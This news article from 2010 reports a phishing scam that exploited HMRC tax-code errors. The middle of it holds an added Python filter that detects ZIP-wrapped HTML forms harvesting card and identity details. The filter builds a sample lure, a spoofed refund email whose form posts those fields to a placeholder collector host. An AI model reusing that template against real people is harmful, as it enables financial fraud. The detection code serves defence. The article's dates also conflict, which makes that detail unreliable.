Hackers Capitalized on Tax Blunders in UK
Internet security firms Sophos and GFI Security have warned people in Britain about a new email phishing scam that exploits the recent tax-error letters from Her Majesty's Revenue and Customs (HMRC) to steal private details.
According to the news, almost 6 million people in the UK paid the incorrect amount of tax due to HMRC mistakes with employee PAYE codes. Nearly 4.3 million people are due a refund, whereas 1.4 million have to hand over an average of £1,428 each.
Hackers have wasted no time and have started sending new phishing emails to the affected taxpayers.
The phishing email appears to have been sent from an HMRC address, with the subject line "You have an HMRC Refund." It tells recipients that they have paid too much money and must fill in an attached form to get it back.
Attached to the email is a file, 'Refund-Form.zip', which contains an HTML file called 'Refund-Form.htm'. The HTML file asks for details such as credit card number, date of birth and mother's maiden name.
Graham Cluley, Senior Technology Consultant at Sophos, stated that if a user filled in the form, his or her private data would be uploaded to a Chinese server and the user would have been phished, as reported by Help Net Security on November 7, 2010.
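A mail filter can catch this lure shape by opening ZIP attachments and checking any HTML file inside for a form that asks for these details and submits them to a remote server. The sketch below is an added example, not code from Sophos, GFI Security or HMRC; the function names, the field-name keywords, the assumption that the form submits through its action attribute, and the collector.example and hmrc.example hosts are all constructed for illustration.

```python
import io, re, zipfile
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser
# Field-name keywords for the details this lure asks for (assumed naming).
SENSITIVE = re.compile(r"card|birth|maiden", re.I)

class FormAudit(HTMLParser):
    """Collect form targets and sensitive-looking input names."""
    def __init__(self):
        super().__init__()
        self.actions, self.fields = [], []
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append((a.get("action") or "").lower())
        elif tag == "input" and SENSITIVE.search(a.get("name") or ""):
            self.fields.append(a["name"])

def scan_message(raw):
    """One finding per HTML file in a ZIP attachment that collects sensitive data."""
    findings = []
    msg = message_from_bytes(raw, policy=policy.default)
    for part in msg.iter_attachments():
        blob = io.BytesIO(part.get_payload(decode=True) or b"")
        if not zipfile.is_zipfile(blob):
            continue
        with zipfile.ZipFile(blob) as zf:
            for info in zf.infolist():
                name = info.filename.lower()
                if not name.endswith((".htm", ".html")) or info.file_size > 1_000_000:
                    continue  # the size cap avoids inflating a zip bomb
                audit = FormAudit()
                audit.feed(zf.read(info).decode("utf-8", "replace"))
                remote = [u for u in audit.actions if u.startswith(("http://", "https://"))]
                if audit.fields and remote:
                    findings.append({"attachment": part.get_filename(), "member": info.filename,
                                     "fields": audit.fields, "posts_to": remote})
    return findings

def build_sample():
    """Constructed message modelled on the description above, not a real capture."""
    html = ('<form action="http://collector.example/submit"><input name="card_number">'
            '<input name="date_of_birth"><input name="mothers_maiden_name"><input name="email"></form>')
    with zipfile.ZipFile(buf := io.BytesIO(), "w") as zf:
        zf.writestr("Refund-Form.htm", html)
    msg = EmailMessage()
    msg["Subject"], msg["From"] = "You have an HMRC Refund", "refunds@hmrc.example"
    msg.set_content("Please complete the attached form.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip", filename="Refund-Form.zip")
    return msg.as_bytes()
```

Calling scan_message(build_sample()) returns a single finding that names the archive, the HTML member, the three sensitive fields and the remote form target.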
Security experts said that hackers usually try to collect users' bank details and then take money from their accounts. Not only do users risk having their accounts emptied, but their private details are also sold to other hackers.
Chris Hopson, Director of Customer Contact at HMRC, stated that HMRC informed users about tax refunds only in writing, by post. He said that it never used phone calls, emails or external firms for this purpose.
Hopson added that users who received a phone call asking them to give any bank details were advised to report it to the police immediately.
Further, he said that users who received an email claiming to be from HMRC should forward it to HMRC for investigation before deleting it permanently.
» SPAMfighter News - 16-09-2010